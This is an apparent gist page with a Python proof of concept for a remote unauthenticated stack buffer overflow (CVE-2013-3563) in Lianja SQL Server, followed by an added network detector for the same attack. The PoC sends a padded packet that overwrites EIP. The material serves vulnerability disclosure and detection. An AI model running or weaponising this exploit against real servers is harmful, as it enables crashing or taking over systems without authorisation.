@zeroSteiner
Created May 22, 2013 12:55
Lianja SQL Server Stack Buffer Overflow Proof of Concept
#!/usr/bin/env python
"""
lianja_sql_bof.py
Discovered: 5-20-2013
By: Spencer McIntyre (zeroSteiner)
SecureState Research and Innovation Team
www.securestate.com
Background:
-----------
LianjaSQL Server Remote Unauthenticated Stack Buffer Overflow
Details:
--------
The Lianja SQL server 1.0.0RC5.1 is vulnerable to a stack buffer overflow that
can be triggered when an unauthenticated user sends a specially crafted packet.
The result can lead to remote code execution as the user which runs the Lianja
SQL server.
Vulnerable Versions:
--------------------
Tested on:
Lianja SQL Server 1.0.0RC5.1 Windows XP SP2
Lianja SQL Server 1.0.0RC5.1 Windows XP SP3
Lianja SQL Server 1.0.0RC5.1 Windows Server 2003
Lianja SQL Server 1.0.0RC5.1 Windows 7 SP1
Vendor: Lianja
Site: http://www.lianja.com/
References:
-----------
CVE-2013-3563
"""
import sys
import socket


def main():
    if len(sys.argv) < 2:
        print '[-] Usage: ' + sys.argv[0] + ' [TARGET_IP]'
        return 0
    data_1 = '000152E1' + 'A' + ('0' * 19991) + 'BBBB'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 8001))
    s.send("db_net")
    s.recv(4)
    # At this point the main SQL Server process has spawned the db_netserver.exe
    # process. Attach a debugger to db_netserver.exe before continuing.
    raw_input('Attach a debugger to db_netserver.exe, then hit enter to continue')
    # In this example EIP is overwritten with \x42\x42\x42\x42.
    s.send(data_1)
    s.close()


if __name__ == '__main__':
    main()
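The PoC above shows the only protocol facts a defender has to work with: the listener is TCP 8001, the client opens with the string "db_net", reads four bytes back, and the crash is triggered by an oversized, heavily padded second packet. The following detector is an added example written for this page, not code from the gist or from Lianja: it inspects reassembled client-to-server streams and flags sessions that match that shape. The `Session` record, the sample streams and both thresholds (`MAX_PAYLOAD_LEN`, `MAX_BYTE_RUN`) are assumptions made for the example; tune them against real db_net traffic before deploying anything like this.

```python
# Added example (not part of the gist): session-level heuristic for the Lianja
# SQL "db_net" listener. Port, handshake string and the exchange order come from
# the PoC on this page; thresholds and the Session record are assumptions.
from dataclasses import dataclass, field
from typing import List

LIANJA_PORT = 8001            # from the PoC
HANDSHAKE = b"db_net"         # from the PoC
MAX_PAYLOAD_LEN = 4096        # assumed: larger post-handshake packets are suspicious
MAX_BYTE_RUN = 1024           # assumed: longer runs of one byte look like padding


@dataclass
class Session:
    """One reassembled client->server TCP stream (constructed for the example)."""
    client_ip: str
    dst_port: int
    client_payloads: List[bytes] = field(default_factory=list)


def longest_byte_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte value in data."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        if run > best:
            best = run
    return best


def inspect_session(sess: Session) -> List[str]:
    """Return finding strings for one session; an empty list means nothing suspicious.

    Only sessions to the db_net port that start with the db_net handshake are
    examined, so unrelated services on other ports never produce findings.
    """
    findings: List[str] = []
    if sess.dst_port != LIANJA_PORT or not sess.client_payloads:
        return findings
    if sess.client_payloads[0] != HANDSHAKE:
        return findings
    for idx, payload in enumerate(sess.client_payloads[1:], start=1):
        if len(payload) > MAX_PAYLOAD_LEN:
            findings.append(
                f"{sess.client_ip}: packet {idx} after db_net handshake is "
                f"{len(payload)} bytes (limit {MAX_PAYLOAD_LEN})")
        run = longest_byte_run(payload)
        if run > MAX_BYTE_RUN:
            findings.append(
                f"{sess.client_ip}: packet {idx} contains a {run}-byte run of "
                f"one value (limit {MAX_BYTE_RUN})")
    return findings


# Constructed sample sessions: a short exchange of the kind a real client would
# send, and one whose second packet has the shape of the crash packet (about
# 20 KB, almost entirely one repeated character). Neither is captured traffic.
BENIGN = Session("10.0.0.5", LIANJA_PORT, [HANDSHAKE, b"00000010SELECT 1;"])
SUSPECT = Session("10.0.0.9", LIANJA_PORT, [HANDSHAKE, b"00004E20" + b"0" * 20000])


if __name__ == "__main__":
    for sess in (BENIGN, SUSPECT):
        for finding in inspect_session(sess):
            print("[!]", finding)
```

The two heuristics are deliberately independent: the size check catches any oversized post-handshake packet, while the repeated-byte check catches padding even when an attacker keeps the packet under the size limit. Running the block prints two findings for `SUSPECT` and nothing for `BENIGN`.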